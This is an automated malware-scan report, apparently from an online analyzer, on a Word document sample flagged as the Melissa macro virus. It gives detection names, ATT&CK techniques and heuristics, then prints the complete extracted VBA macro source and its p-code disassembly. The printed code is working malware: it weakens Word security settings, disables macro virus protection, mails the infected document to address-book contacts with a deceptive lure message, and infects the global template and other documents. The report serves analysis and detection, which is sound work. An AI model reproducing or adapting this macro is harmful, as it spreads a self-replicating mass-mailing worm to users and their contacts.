MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malware execution in Office documents. The script attempts to replicate itself and spread via Outlook by accessing the MAPI interface and sending the document as an attachment to contacts. This behavior is consistent with the Melissa virus family, as indicated by the ClamAV detection names.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
ADI1.CodeModule.DeleteLines 1, ADCL -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10887 bytes |
SHA-256: 3c19429d48afae0a8e59802bb033504e29b337beca5f8b0d1436861e8decc10c |
|||
|
Detection
ClamAV:
Doc.Trojan.Melissa-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = True
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = True
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Autluk" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 2 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
End Sub
' Processing file: /opt/analyzer/scan_staging/f106095f66df4fb6ac54682b012db749.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Melissa - 5178 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #2:
' LitVarSpecial (True)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #3:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #4:
' ElseBlock
' Line #5:
' LitVarSpecial (True)
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #6:
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt ConfirmConversions
' BoS 0x0000
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt VirusProtection
' BoS 0x0000
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt SaveNormalPrompt
' Line #7:
' EndIfBlock
' Line #8:
' LitStr 0x0000 ""
' LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\"
' LitStr 0x0008 "Melissa?"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x000E "... by Kwyjibo"
' Ne
' IfBlock
' Line #9:
' Ld UngaDasOutlook
' LitStr 0x0006 "Autluk"
' Eq
' IfBlock
' Line #10:
' LitStr 0x0007 "profile"
' LitStr 0x0008 "password"
' Ld DasMapiName
' ArgsMemCall Logon 0x0002
' Line #11:
' StartForVariable
' Ld y
' EndForVariable
' LitDI2 0x0001
' Ld DasMapiName
' MemLd AddressLists
' MemLd Count
' For
' Line #12:
' SetStmt
' Ld y
' Ld DasMapiName
' ArgsMemLd AddressLists 0x0001
' Set AddyBook
' Line #13:
' LitDI2 0x0001
' St x
' Line #14:
' SetStmt
' LitDI2 0x0000
' Ld UngaDasOutlook
' ArgsMemLd CreateItem 0x0001
' Set BreakUmOffASlice
' Line #15:
' StartForVariable
' Ld oo
' EndForVariable
' LitDI2 0x0001
' Ld AddyBook
' MemLd AddressEntries
' MemLd Count
' For
' Line #16:
' Ld x
' Ld AddyBook
' ArgsMemLd AddressEntries 0x0001
' St Peep
' Line #17:
' Ld Peep
' Ld BreakUmOffASlice
' MemLd Recipients
' ArgsMemCall Add 0x0001
' Line #18:
' Ld x
' LitDI2 0x0001
' Add
' St x
' Line #19:
' Ld x
' LitDI2 0x0002
' Gt
' If
' BoSImplicit
' Ld AddyBook
' MemLd AddressEntries
' MemLd Count
' St oo
' EndIf
' Line #20:
' StartForVariable
' Ld oo
' EndForVariable
' NextVar
' Line #21:
' LitStr 0x0017 "Important Message From "
' Ld Application
' MemLd UserName
' Concat
' Ld BreakUmOffASlice
' MemSt Subject
' Line #22:
' LitStr 0x0042 "Here is that document you asked for ... don't show anyone else ;-)"
' Ld BreakUmOffASlice
' MemSt Body
' Line #23:
' Ld ActiveDocument
' MemLd FullName
' Ld BreakUmOffASlice
' MemLd Attachments
' ArgsMemCall Add 0x0001
' Line #24:
' Ld BreakUmOffASlice
' ArgsMemCall Send 0x0000
' Line #25:
' LitStr 0x0000 ""
' St Peep
' Line #26:
' StartForVariable
' Ld y
' EndForVariable
' NextVar
' Line #27:
' Ld DasMapiName
' ArgsMemCall Logoff 0x0000
' Line #28:
' EndIfBlock
' Line #29:
' EndIfBlock
' Line #30:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set ADI1
' Line #31:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set NTI1
' Line #32:
' Ld NTI1
' MemLd CodeModule
' MemLd CountOfLines
' St NTCL
' Line #33:
' Ld ADI1
' MemLd CodeModule
' MemLd CountOfLines
' St ADCL
' Line #34:
' LitDI2 0x0002
' St BGN
' Line #35:
' Ld ADI1
' MemLd New
' LitStr 0x0007 "Melissa"
' Ne
' IfBlock
' Line #36:
' LineCont 0x0004 05 00 00 00
' Ld ADCL
' LitDI2 0x0000
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' Ld ADCL
' Ld ADI1
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' EndIf
' Line #37:
' SetStmt
' Ld ADI1
' Set ToInfect
' Line #38:
' LitStr 0x0007 "Melissa"
' Ld ADI1
' MemSt New
' Line #39:
' LitVarSpecial (True)
' St DoAD
' Line #40:
' EndIfBlock
' Line #41:
' Ld NTI1
' MemLd New
' LitStr 0x0007 "Melissa"
' Ne
' IfBlock
' Line #42:
' LineCont 0x0004 05 00 00 00
' Ld NTCL
' LitDI2 0x0000
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' Ld NTCL
' Ld NTI1
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' EndIf
' Line #43:
' SetStmt
' Ld NTI1
' Set ToInfect
' Line #44:
' LitStr 0x0007 "Melissa"
' Ld NTI1
' MemSt New
' Line #45:
' LitVarSpecial (True)
' St DoNT
' Line #46:
' EndIfBlock
' Line #47:
' Ld DoNT
' LitVarSpecial (True)
' Ne
' Ld DoAD
' LitVarSpecial (True)
' Ne
' And
' If
' BoSImplicit
' GoTo CYA
' EndIf
' Line #48:
' Ld DoNT
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #49:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ADI1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0000 ""
' Eq
' DoWhile
' Line #50:
' LitDI2 0x0001
' Ld ADI1
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #51:
' Loop
' Line #52:
' LitStr 0x001C "Private Sub Document_Close()"
' Paren
' Ld ToInfect
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #53:
' Ld BGN
' LitDI2 0x0001
' Ld ADI1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0000 ""
' Ne
' DoWhile
' Line #54:
' Ld BGN
' Ld BGN
' LitDI2 0x0001
' Ld ADI1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Ld ToInfect
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #55:
' Ld BGN
' LitDI2 0x0001
' Add
' St BGN
' Line #56:
' Loop
' Line #57:
' EndIfBlock
' Line #58:
' Ld DoAD
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #59:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NTI1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0000 ""
' Eq
' DoWhile
' Line #60:
' LitDI2 0x0001
' Ld NTI1
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #61:
' Loop
' Line #62:
' LitStr 0x001B "Private Sub Document_Open()"
' Paren
' Ld ToInfect
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #63:
' Ld BGN
' LitDI2 0x0001
' Ld NTI1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0000 ""
' Ne
' DoWhile
' Line #64:
' Ld BGN
' Ld BGN
' LitDI2 0x0001
' Ld NTI1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Ld ToInfect
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #65:
' Ld BGN
' LitDI2 0x0001
' Add
' St BGN
' Line #66:
' Loop
' Line #67:
' EndIfBlock
' Line #68:
' Label CYA
' Line #69:
' Ld NTCL
' LitDI2 0x0000
' Ne
' Ld ADCL
' LitDI2 0x0000
' Eq
' And
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd New
' LitStr 0x0008 "Document"
' FnInStr3
' LitVarSpecial (False)
' Eq
' Paren
' And
' IfBlock
' Line #70:
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' Line #71:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd New
' LitStr 0x0008 "Document"
' FnInStr3
' LitVarSpecial (False)
' Ne
' Paren
' ElseIfBlock
' Line #72:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' BoS 0x0000
' EndIfBlock
' Line #73:
' EndSub
' Line #74:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.